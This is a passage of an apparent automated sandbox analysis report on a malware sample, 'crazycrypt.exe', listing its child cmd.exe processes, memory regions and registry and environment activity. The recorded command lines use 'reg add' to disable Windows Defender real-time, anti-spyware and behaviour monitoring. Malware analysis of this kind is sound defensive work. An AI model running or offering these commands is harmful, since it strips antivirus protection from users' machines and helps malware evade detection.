| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4ab10000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77740000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77756d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x777523d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77748290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x777517e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:54 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 113927 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #6: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9e4 |
| Parent PID | 0x98c (c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9E8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0005ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00066fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002d0000 | 0x00336fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x005c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00750fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x01b5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b60000 | 0x01b60000 | 0x01ea2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01eb0000 | 0x0217efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4ab10000 | 0x4ab68fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef8dc0000 | 0x7fef8dc7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xacc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4ab10000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77740000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77756d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x777523d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77748290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x777517e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:54 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 113989 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #7: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 00000001 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9ec |
| Parent PID | 0x98c (c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
9F0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00687fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00810fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x01c1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c20000 | 0x01c20000 | 0x01f62fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f70000 | 0x0223efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4ab10000 | 0x4ab68fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef8dc0000 | 0x7fef8dc7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\reg.exe | os_pid = 0xabc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x4ab10000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77740000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77756d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x777523d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77748290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x777517e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-19 14:11:54 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 114021 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #8: cmd.exe
59
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableBehaviorMonitoring /t REG_DWORD /d 00000001 /f |
| Initial Working Directory | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ |
| Monitor | Start Time: 00:01:19, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa04 |
| Parent PID | 0x98c (c:\users\5p5nrgjn0js halpmcxz\desktop\crazycrypt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | XDUWTFONO\5p5NrGJn0jS HALPmcxz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A08
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x0040ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x006d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x00860fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x01c6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c70000 | 0x01c70000 | 0x01fb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01fc0000 | 0x0228efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x4ab10000 | 0x4ab68fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77640000 | 0x77739fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77740000 | 0x7785efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77860000 | 0x77a08fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fef8dc0000 | 0x7fef8dc7fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd900000 | 0x7fefd96afff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdb80000 | 0x7fefdc48fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdd30000 | 0x7fefdd3dfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefdd40000 | 0x7fefdd6dfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefed10000 | 0x7fefed76fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefed80000 | 0x7fefee88fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feffa80000 | 0x7feffb1efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feffb80000 | 0x7feffb80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
